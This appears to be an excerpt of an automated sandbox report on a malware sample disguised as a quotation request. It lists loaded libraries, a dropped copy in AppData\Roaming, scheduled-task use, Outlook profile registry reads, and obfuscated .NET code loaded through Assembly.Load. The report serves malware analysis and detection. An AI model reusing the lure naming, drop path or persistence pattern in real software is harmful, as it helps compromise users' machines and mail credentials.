Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs .Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs .Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C576A0 push eax; ret 0_2_06C576A1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_01259C30 push esp; retf 0127h 9_2_01259D55
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A76A0 push eax; ret 11_2_069A76A1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9241 push es; ret 14_2_06DB9244
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: section name: .text entropy: 7.944191004977694
Source: jnqeRRexnD.exe.0.dr Static PE information: section name: .text entropy: 7.944191004977694
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, UPSlk94tjStGG9oASY.cs High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ovvxIOBcgJSvJUVhrj.cs High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, jQhdguv7LgIcxDIctV.cs High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, aeNkwmhsZGOkwOyTql.cs High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, sCMxesXXjqAegoG9j6G.cs High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, iMBWkb0as7CGSU5mdc.cs High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, H9Z5mTAKXZyOtcycmt.cs High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, cVsg14PySj56ttQ831.cs High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, QqELW6HxRqDoYT0tcl.cs High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, POlyOhfijgKRcdlA2f.cs High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ERskp5zfMQtJPNdwj4.cs High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, hJrajR89jKhw22GlAw.cs High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, f0fXPuminhNt55QPq6.cs High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, knUupbQZqxsA2ZB6Nx.cs High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, RjDupPnYBMvHAAEH05.cs High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, o9P0T5X38MD9r6NPGD7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, UPSlk94tjStGG9oASY.cs High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ovvxIOBcgJSvJUVhrj.cs High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, jQhdguv7LgIcxDIctV.cs High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, aeNkwmhsZGOkwOyTql.cs High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, sCMxesXXjqAegoG9j6G.cs High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, iMBWkb0as7CGSU5mdc.cs High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, H9Z5mTAKXZyOtcycmt.cs High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, cVsg14PySj56ttQ831.cs High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, QqELW6HxRqDoYT0tcl.cs High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, POlyOhfijgKRcdlA2f.cs High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ERskp5zfMQtJPNdwj4.cs High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, hJrajR89jKhw22GlAw.cs High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, f0fXPuminhNt55QPq6.cs High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, knUupbQZqxsA2ZB6Nx.cs High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, RjDupPnYBMvHAAEH05.cs High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, o9P0T5X38MD9r6NPGD7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Boot Survival

